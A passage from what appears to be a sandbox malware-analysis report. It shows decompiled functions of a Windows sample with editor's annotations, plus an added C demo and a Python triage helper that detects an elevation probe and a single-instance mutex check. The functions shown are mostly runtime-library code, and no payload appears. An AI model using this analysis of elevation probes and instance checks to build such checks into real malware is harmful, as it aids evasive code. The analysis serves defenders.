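    uint32_t size;   /* page-aligned length of the request */
} commit_result_t;

/* Stand-in for VirtualAlloc(addr, len, MEM_COMMIT, PAGE_READWRITE); nonzero = ok. */
typedef int (*commit_fn)(uint32_t addr, uint32_t len, void *ctx);

uint32_t page_floor(uint32_t a) { return a & ~(PAGE_SIZE - 1); }
uint32_t page_ceil(uint32_t a)  { return (a + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1); }

/* Commit every page of [addr, addr+len) that lies inside a tracked region.
 * Mirrors the decompiled control flow: the first failing commit zeroes the
 * base slot and ends the walk; pages outside every region are never touched. */
commit_result_t commit_range(uint32_t addr, uint32_t len,
                             const region_t *head, commit_fn commit, void *ctx)
{
    commit_result_t out;
    uint32_t lo = page_floor(addr);        /* __eax & 0xfffff000 */
    uint32_t hi = page_ceil(addr + len);   /* (__eax + len + 0xfff) & 0xfffff000 */
    out.base = lo;
    out.size = hi - lo;

    for (const region_t *r = head->next; r != head; r = r->next) {
        uint32_t start = r->base;
        uint32_t end = r->base + r->size;
        if (start < lo) start = lo;        /* clip region to the request */
        if (end > hi) end = hi;
        if (end > start && !commit(start, end - start, ctx)) {
            out.base = 0;                  /* failure: *__ecx = 0, return */
            return out;
        }
    }
    return out;
}

/* Recorder used by the demo: logs commit calls instead of touching memory. */
typedef struct {
    uint32_t addr[8];
    uint32_t len[8];
    int count;
    uint32_t fail_at;   /* a commit starting at this address fails; 0 = never */
} recorder_t;

static int record_commit(uint32_t addr, uint32_t len, void *ctx)
{
    recorder_t *rec = (recorder_t *)ctx;
    if (rec->count < 8) { rec->addr[rec->count] = addr; rec->len[rec->count] = len; }
    rec->count++;
    return rec->fail_at == 0 || addr != rec->fail_at;
}

/* Constructed input (not from the sample): sentinel head plus two reserved
 * regions, and a request that straddles both and the unreserved gap between. */
commit_result_t run_demo(uint32_t fail_at, recorder_t *rec)
{
    static region_t head, a, b;
    head.next = &a;
    a.next = &b;    a.base = 0x00400000; a.size = 0x5000; /* 0x400000..0x405000 */
    b.next = &head; b.base = 0x00410000; b.size = 0x2000; /* 0x410000..0x412000 */

    *rec = (recorder_t){0};
    rec->fail_at = fail_at;
    return commit_range(0x00404010, 0xD000, &head, record_commit, rec);
}

int main(void)
{
    recorder_t rec;
    commit_result_t r = run_demo(0, &rec);
    printf("aligned range %#x + %#x, %d commit call(s)\n",
           (unsigned)r.base, (unsigned)r.size, rec.count);
    for (int i = 0; i < rec.count && i < 8; i++)
        printf("  commit %#x len %#x\n", (unsigned)rec.addr[i], (unsigned)rec.len[i]);
    return 0;
}
```

Run stand-alone it reports the aligned range 0x404000 + 0xE000 and two commit calls, 0x404000/0x1000 and 0x410000/0x2000: the unreserved gap 0x405000..0x410000 is skipped, which is the point of walking the region list rather than committing the whole request. Note also that the trace shows flProtect = 4 (PAGE_READWRITE), so this particular VirtualAlloc commits writable, non-executable pages.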

                                                    C-Code - Quality: 53%
                                                    			E004738BC(char __eax, signed int __ebx) {
                                                    				char _v8;
                                                    				intOrPtr* _t11;
                                                    				void* _t14;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t28;
                                                    
                                                    				_push(__ebx);
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				_push(_t28);
                                                    				_push(0x473922);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t28;
                                                    				_t11 =  *0x49de34; // 0x49b0ec
                                                    				if( *_t11 == 2) {
                                                    					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
                                                    					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
                                                    						CloseServiceHandle(_t14);
                                                    					}
                                                    				}
                                                    				_pop(_t25);
                                                    				 *[fs:eax] = _t25;
                                                    				_push(0x473929);
                                                    				return E004049C0( &_v8);
			}

Line addresses (side column of the listing above, one entry per statement line): 0x004738c0 0x004738c1 0x004738c7 0x004738ce 0x004738cf 0x004738d4 0x004738d7 0x004738da 0x004738e2 0x004738f8 0x00473904 0x00473907 0x00473907 0x00473904 0x0047390e 0x00473911 0x00473914 0x00473921

                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleManagerOpenService
                                                    • String ID:
                                                    • API String ID: 1199824460-0
                                                    • Opcode ID: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                    • Opcode Fuzzy Hash: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00458384(void* __eax) {
                                                    			// Editor's note: the index range (-22..-2) and the split between system cursors and the
                                                    			// module's own cursor resources (-21 and -17..-12) match the cursor table built by the
                                                    			// Delphi VCL TScreen constructor (crSizeAll = -22 .. crArrow = -2), i.e. runtime-library
                                                    			// initialisation rather than payload logic.
                                                    				struct HICON__* _t5;
                                                    				void* _t7;
                                                    				void* _t8;
                                                    				struct HINSTANCE__* _t11;
                                                    				CHAR** _t12;
                                                    				void* _t13;
                                                    
                                                    				_t13 = __eax;
                                                    				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00); // 0x7f00 = MAKEINTRESOURCE(32512) = IDC_ARROW, the default system cursor
                                                    				_t8 = 0xffffffea; // cursor index -22; the loop runs -22..-2 and stops at -1
                                                    				_t12 = 0x49befc; // table of cursor resource-name pointers, one entry per index
                                                    				do {
                                                    					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) { // index outside -17..-12
                                                    						if(_t8 != 0xffffffeb) { // and not -21
                                                    							_t11 = 0; // hInstance 0: predefined system cursor
                                                    						} else {
                                                    							goto L4;
                                                    						}
                                                    					} else {
                                                    						L4:
                                                    						_t11 =  *0x49e668; // 0x400000, this module's HINSTANCE: indices -21 and -17..-12 are loaded from its own resources
                                                    					}
                                                    					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                    					_t7 = E0045843C(_t13, _t5, _t8); // called with (this, hCursor, index); body not in this listing
                                                    					_t8 = _t8 + 1;
                                                    					_t12 =  &(_t12[1]);
                                                    				} while (_t8 != 0xffffffff);
                                                    				return _t7;
                                                    			}

                                                    Instruction addresses (one per statement line of the C code above, in order; 0x00000000 where no instruction maps to the line):
                                                    0x00458388, 0x00458396, 0x00458399, 0x0045839e, 0x004583a3, 0x004583a6, 0x004583b0, 0x004583ba,
                                                    0x00000000, 0x00000000, 0x00000000, 0x004583b2, 0x004583b2, 0x004583b2, 0x004583b2, 0x004583c0,
                                                    0x004583cb, 0x004583d0, 0x004583d1, 0x004583d4, 0x004583dd

                                                    APIs: none listed
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches: none listed
                                                    Similarity
                                                    • API ID: CursorLoad
                                                    • String ID:
                                                    • API String ID: 3238433803-0
                                                    • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                    • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00409A90(void* __eax, long __edx) {
                                                    				int _t4;
                                                    				long _t7;
                                                    
                                                    				_t7 = 0;
                                                    				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed; E00404E80 yields the C string for the path held in __eax, __edx is the attribute mask
                                                    				if(_t4 == 0) {
                                                    					_t7 = GetLastError(); // on failure return the Win32 error code instead of 0
                                                    				}
                                                    				return _t7;
                                                    			}

                                                    Instruction addresses (one per statement line of the C code above, in order):
                                                    0x00409a97, 0x00409aa2, 0x00409aa9, 0x00409ab0, 0x00409ab0, 0x00409ab7

                                                    APIs
                                                    • SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                    • GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches: none listed
                                                    Similarity
                                                    • API ID: AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1799206407-0
                                                    • Opcode ID: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                    • Opcode Fuzzy Hash: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 60%
                                                    			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
                                                    				char _v8;
                                                    				char _v9;
                                                    				void* _t13;
                                                    				intOrPtr _t25;
                                                    				void* _t27;
                                                    				void* _t30;
                                                    
                                                    				_v9 = __edx; // flag: keep the mutex handle open after creation
                                                    				_v8 = __eax; // mutex name (string)
                                                    				E00404E70(_v8);
                                                    				_push(_t30);
                                                    				_push(0x4742ac);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t30 + 0xfffffff8; // link a handler at 0x4742ac into the SEH chain (fs:[0]); Borland-style try/finally frame
                                                    				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed; E00406F90 wraps CreateMutexA (listed as its subcall below), E00404E80 yields the C string of the name
                                                    				_t27 = _t13;
                                                    				if(GetLastError() != 0xb7) { // 0xb7 = ERROR_ALREADY_EXISTS: if the named mutex already existed the handle is deliberately left open
                                                    					if(_t27 != 0 && _v9 == 0) {
                                                    						CloseHandle(_t27); // freshly created and not asked to keep it: release the handle
                                                    					}
                                                    				}
                                                    				_pop(_t25);
                                                    				 *[fs:eax] = _t25; // unlink the SEH frame
                                                    				_push(0x4742b3);
                                                    				return E004049C0( &_v8); // epilogue: finalize the name string
                                                    			}

                                                    Instruction addresses (one per statement line of the C code above, in order):
                                                    0x00474244, 0x00474247, 0x0047424d, 0x00474254, 0x00474255, 0x0047425a, 0x0047425d, 0x0047426f,
                                                    0x00474274, 0x00474280, 0x00474288, 0x00474291, 0x00474291, 0x00474288, 0x00474298, 0x0047429b,
                                                    0x0047429e, 0x004742ab

                                                    APIs
                                                      • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    • GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
                                                    • CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
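Two of the API pairs in this listing deserve a second look during triage. The OpenSCManagerA call at 004738F8 (earlier in the listing) asks for dwDesiredAccess 0x000F003F, which is SC_MANAGER_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED 0x000F0000 plus the six SC_MANAGER_* rights), and the handle is closed by the very next call; a handle that is never used is the usual shape of an "am I elevated?" probe, because an unelevated caller gets ERROR_ACCESS_DENIED from that open. E0047423C above compares GetLastError() after CreateMutexA with 0xb7, ERROR_ALREADY_EXISTS, the standard "is another instance already running?" check. The helper below is an added example written for this page, not code from the report or from the sample: it parses API lines in the report's own format (note that the sandbox prints raw stack slots, so a line can carry more tokens than the API has parameters and arguments must be taken by position), decodes the SCM access mask, and flags both pairs. The sample lines are the ones printed in this listing; the function and constant names are the editor's.

```python
"""Triage helper for the per-function "APIs" lines of a Joe Sandbox listing.
Added example, not part of the original report or of the analysed sample: parses
API-call lines in the report's format and flags OpenSCManager*(SC_MANAGER_ALL_ACCESS)
followed directly by CloseServiceHandle, and CreateMutex* followed by GetLastError."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One API line as printed in the report, e.g.
#   • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
#   • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
API_LINE = re.compile(
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

ERROR_ALREADY_EXISTS = 0xB7  # the value E0047423C compares GetLastError() against

# OpenSCManager access-mask bits (winsvc.h specific rights, winnt.h standard rights).
SC_MANAGER_RIGHTS = {
    0x00000001: "SC_MANAGER_CONNECT", 0x00000002: "SC_MANAGER_CREATE_SERVICE",
    0x00000004: "SC_MANAGER_ENUMERATE_SERVICE", 0x00000008: "SC_MANAGER_LOCK",
    0x00000010: "SC_MANAGER_QUERY_LOCK_STATUS", 0x00000020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER",
}
SC_MANAGER_ALL_ACCESS = 0x000F003F  # STANDARD_RIGHTS_REQUIRED (0xF0000) | all six specific rights


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                # raw stack tokens as printed; "?" where the sandbox had no value
    ref: int                       # address of the call instruction
    subcall: Optional[int] = None  # set for "Part of subcall function X" lines

    def arg(self, i: int) -> Optional[int]:
        """Argument i as an int, or None if absent or unresolved ("?")."""
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for raw in text.splitlines():
        m = API_LINE.search(raw)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args").strip() else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def decode_sc_manager_access(mask: int) -> List[str]:
    """Names of the rights set in an OpenSCManager access mask, lowest bit first."""
    names = [name for bit, name in sorted(SC_MANAGER_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(SC_MANAGER_RIGHTS)
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:08x})")
    return names


def find_scm_elevation_probe(calls: List[ApiCall]):
    """OpenSCManager* asking for SC_MANAGER_ALL_ACCESS whose handle is closed by the very
    next call: the handle is never used, so the open only tests whether the caller holds
    full rights on the SCM. Returns (open_ref, close_ref) or None."""
    for a, b in zip(calls, calls[1:]):
        if (a.api.startswith("OpenSCManager") and a.arg(2) == SC_MANAGER_ALL_ACCESS
                and b.api == "CloseServiceHandle"):
            return (a.ref, b.ref)
    return None


def find_mutex_instance_check(calls: List[ApiCall]):
    """CreateMutex* (directly or via a subcall) followed by GetLastError in the same
    listing, the API shape of an "already running?" check. Returns (create_ref, err_ref) or None."""
    create = None
    for c in calls:
        if c.api.startswith("CreateMutex"):
            create = c
        elif c.api == "GetLastError" and create is not None:
            return (create.ref, c.ref)
    return None


# Constructed samples: the API lines of three functions in this listing, copied verbatim.
SAMPLE_SCM = """
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
• CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
"""
SAMPLE_MUTEX = """
  • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
• GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
• CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
"""
SAMPLE_ATTR = """
• SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
• GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
"""

if __name__ == "__main__":
    for name, text in (("SCM (ref 004738F8)", SAMPLE_SCM), ("E0047423C", SAMPLE_MUTEX), ("E00409A90", SAMPLE_ATTR)):
        calls = parse_api_lines(text)
        print(name, [c.api for c in calls], "scm probe:", find_scm_elevation_probe(calls),
              "mutex check:", find_mutex_instance_check(calls))
    print("0x000F003F =", " | ".join(decode_sc_manager_access(SC_MANAGER_ALL_ACCESS)))
```

The SCM detector deliberately requires CloseServiceHandle to be the next call: an OpenSCManager with all access whose handle is then passed to EnumServicesStatus or CreateService is ordinary service code, and only the open-and-discard shape is a privilege probe. The mutex detector only reports the API shape; the comparison against ERROR_ALREADY_EXISTS itself is visible in the C code, not in the API lines, so confirm it there as done for E0047423C above.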
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches: none listed
                                                    Similarity
                                                    • API ID: CloseCreateErrorHandleLastMutex
                                                    • String ID:
                                                    • API String ID: 4294037311-0
                                                    • Opcode ID: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                    • Opcode Fuzzy Hash: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
                                                    			// Editor's note: the control flow and constants below (designer check, WM_KEYFIRST..WM_KEYLAST
                                                    			// forwarded to the parent form, WM_MOUSEFIRST..WM_MOUSELAST handled inline with double-click
                                                    			// folding, 0xb00b = CM_VISIBLECHANGED, then virtual Dispatch) match the Delphi VCL
                                                    			// TControl.WndProc. GetKeyboardState is reached only on the registered mouse-wheel
                                                    			// message, so on its own it is not evidence of key logging.
                                                    				signed int _v12;
                                                    				short _v14;
                                                    				char _v16;
                                                    				signed int _v20;
                                                    				intOrPtr* _v24;
                                                    				char _v280;
                                                    				signed int _t39;
                                                    				signed int _t40;
                                                    				signed int _t46;
                                                    				intOrPtr* _t47;
                                                    				signed int _t50;
                                                    				signed int _t53;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t56;
                                                    				signed int _t67;
                                                    				signed int _t68;
                                                    				void* _t73;
                                                    				signed int* _t79;
                                                    				intOrPtr _t90;
                                                    				intOrPtr* _t96;
                                                    
                                                    				_t79 = __edx;
                                                    				_t96 = __eax;
                                                    				if(( *(__eax + 0x1c) & 0x00000010) == 0) { // state bit 0x10 at +0x1c clear (VCL: not csDesigning): normal message path
                                                    					L4:
                                                    					_t39 =  *_t79;
                                                    					if(_t39 < 0x100 || _t39 > 0x108) { // outside WM_KEYFIRST (0x100)..WM_KEYLAST (0x108)
                                                    						_t40 =  *_t79;
                                                    						__eflags = _t40 - 0x200;
                                                    						if(_t40 < 0x200) { // below WM_MOUSEFIRST (0x200)
                                                    							L30:
                                                    							__eflags = _t40 - 0xb00b;
                                                    							if(_t40 == 0xb00b) { // private message above WM_APP (0x8000); VCL CM_VISIBLECHANGED
                                                    								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
                                                    							}
                                                    							L32:
                                                    							return  *((intOrPtr*)( *_t96 - 0x14))(); // virtual dispatch through the vtable slot at -0x14 (VCL: Dispatch)
                                                    						}
                                                    						__eflags = _t40 - 0x20a;
                                                    						if(_t40 > 0x20a) { // above WM_MOUSELAST (0x20a)
                                                    							goto L30;
                                                    						}
                                                    						__eflags =  *(_t96 + 0x50) & 0x00000080;
                                                    						if(( *(_t96 + 0x50) & 0x00000080) != 0) { // style bit 0x80 at +0x50 set (VCL: csDoubleClicks): keep double-click messages as they are
                                                    							L16:
                                                    							_t46 =  *_t79 - 0x200; // message relative to WM_MOUSEFIRST: 0 = WM_MOUSEMOVE, 1 = WM_LBUTTONDOWN, 2 = WM_LBUTTONUP, 3 = WM_LBUTTONDBLCLK
                                                    							__eflags = _t46;
                                                    							if(__eflags == 0) {
                                                    								L21:
                                                    								_t47 =  *0x49dbcc; // 0x49ebb8
                                                    								E0045B21C( *_t47, _t79, _t96, __eflags);
                                                    								goto L32;
                                                    							}
                                                    							_t50 = _t46 - 1;
                                                    							__eflags = _t50;
                                                    							if(_t50 == 0) {
                                                    								L22:
                                                    								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                                                    								if(__eflags != 0) {
                                                    									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                                                    									goto L32;
                                                    								}
                                                    								return E00403DE8(_t96, __eflags);
                                                    							}
                                                    							_t53 = _t50 - 1;
                                                    							__eflags = _t53;
                                                    							if(_t53 == 0) {
                                                    								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                                                    								goto L32;
                                                    							}
                                                    							__eflags = _t53 == 1;
                                                    							if(_t53 == 1) {
                                                    								goto L22;
                                                    							}
                                                    							_t55 =  *0x49eb18; // 0x0
                                                    							__eflags =  *((char*)(_t55 + 0x20));
                                                    							if( *((char*)(_t55 + 0x20)) == 0) {
                                                    								goto L32;
                                                    							} else {
                                                    								_t56 =  *0x49eb18; // 0x0
                                                    								__eflags =  *(_t56 + 0x1c);
                                                    								if( *(_t56 + 0x1c) == 0) {
                                                    									goto L32;
                                                    								}
                                                    								_t90 =  *0x49eb18; // 0x0
                                                    								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
                                                    								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
                                                    									goto L32;
                                                    								}
                                                    								GetKeyboardState( &_v280); // reached only when the message equals the id stored at *0x49eb18+0x1c (VCL: Mouse.RegWheelMessage); snapshot of modifier keys for the wheel event, not a key hook
                                                    								_v20 =  *_t79;
                                                    								_v16 = E00451924( &_v280); // keyboard snapshot -> shift state
                                                    								_v14 = _t79[1];
                                                    								_v12 = _t79[2];
                                                    								return E00403DE8(_t96, __eflags); // dispatch the rebuilt wheel message (msg, shift state, wParam, lParam)
                                                    							}
                                                    							goto L21;
                                                    						}
                                                    						_t67 = _t40 - 0x203; // 0x203 = WM_LBUTTONDBLCLK; the chain below also matches 0x206 (WM_RBUTTONDBLCLK) and 0x209 (WM_MBUTTONDBLCLK)
                                                    						__eflags = _t67;
                                                    						if(_t67 == 0) {
                                                    							L15:
                                                    							 *_t79 =  *_t79 - 2; // fold the double-click message into the matching button-down message (0x203 -> 0x201, 0x206 -> 0x204, 0x209 -> 0x207)
                                                    							__eflags =  *_t79;
                                                    							goto L16;
                                                    						}
                                                    						_t68 = _t67 - 3;
                                                    						__eflags = _t68;
                                                    						if(_t68 == 0) {
                                                    							goto L15;
                                                    						}
                                                    						__eflags = _t68 != 3;
                                                    						if(_t68 != 3) {
                                                    							goto L16;
                                                    						}
                                                    						goto L15;
                                                    					}
                                                    					_v24 = E004519E0(_t96);
                                                    					if(_v24 == 0) {
                                                    						goto L32;
                                                    					}
                                                    					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                                                    					if(_t73 == 0) {
                                                    						goto L32;
                                                    					}
                                                    				} else {
                                                    					_v24 = E004519E0(__eax);
                                                    					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                                                    						if(_t73 == 0) {
                                                    							goto L4;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t73;
                                                    			}

                                                    Instruction addresses (one per statement line of the C code above, in order; 0x00000000 where no instruction maps to the line):
                                                    0x0043c208, 0x0043c20a, 0x0043c210, 0x0043c248, 0x0043c248, 0x0043c24f, 0x0043c288, 0x0043c28a,
                                                    0x0043c28f, 0x0043c367, 0x0043c367, 0x0043c36c, 0x0043c379, 0x0043c379, 0x0043c37e, 0x00000000,
                                                    0x0043c384, 0x0043c295, 0x0043c29a, 0x00000000, 0x00000000, 0x0043c2a0, 0x0043c2a4, 0x0043c2ba,
                                                    0x0043c2bc, 0x0043c2bc, 0x0043c2c1, 0x0043c2ce, 0x0043c2d0, 0x0043c2d9, 0x00000000, 0x0043c2d9,
                                                    0x0043c2c3, 0x0043c2c3, 0x0043c2c4, 0x0043c2e3, 0x0043c2e3, 0x0043c2e7, 0x0043c2f9, 0x00000000,
                                                    0x0043c2f9, 0x00000000, 0x0043c2ef, 0x0043c2c6, 0x0043c2c6, 0x0043c2c7, 0x0043c300, 0x00000000,
                                                    0x0043c300, 0x0043c2c9, 0x0043c2ca, 0x00000000, 0x00000000, 0x0043c307, 0x0043c30c, 0x0043c310,
                                                    0x00000000, 0x0043c312, 0x0043c312, 0x0043c317, 0x0043c31b, 0x00000000, 0x00000000, 0x0043c31f,
                                                    0x0043c325, 0x0043c328, 0x00000000, 0x00000000, 0x0043c331, 0x0043c338, 0x0043c346, 0x0043c34d,
                                                    0x0043c354, 0x00000000, 0x0043c360, 0x00000000, 0x0043c310, 0x0043c2a6, 0x0043c2a6, 0x0043c2ab,
                                                    0x0043c2b7, 0x0043c2b7, 0x0043c2b7, 0x00000000, 0x0043c2b7, 0x0043c2ad, 0x0043c2ad, 0x0043c2b0,
                                                    0x00000000, 0x00000000, 0x0043c2b2, 0x0043c2b5, 0x00000000, 0x00000000, 0x00000000, 0x0043c2b5,
                                                    0x0043c25f, 0x0043c266, 0x00000000, 0x00000000, 0x0043c275, 0x0043c27d, 0x00000000, 0x0043c283,
                                                    0x0043c212, 0x0043c219, 0x0043c220, 0x00000000, 0x0043c22e, 0x0043c23d, 0x0043c242, 0x00000000,
                                                    0x00000000, 0x0043c242, 0x0043c220, 0x0043c38d

                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0043C331
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardState
                                                    • String ID:
                                                    • API String ID: 1724228437-0
                                                    • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                    • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 39%
                                                    			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
                                                    				char _v8;
                                                    				void* __ecx;
                                                    				CHAR* _t11;
                                                    				struct HINSTANCE__* _t12;
                                                    				struct HRSRC__* _t13;
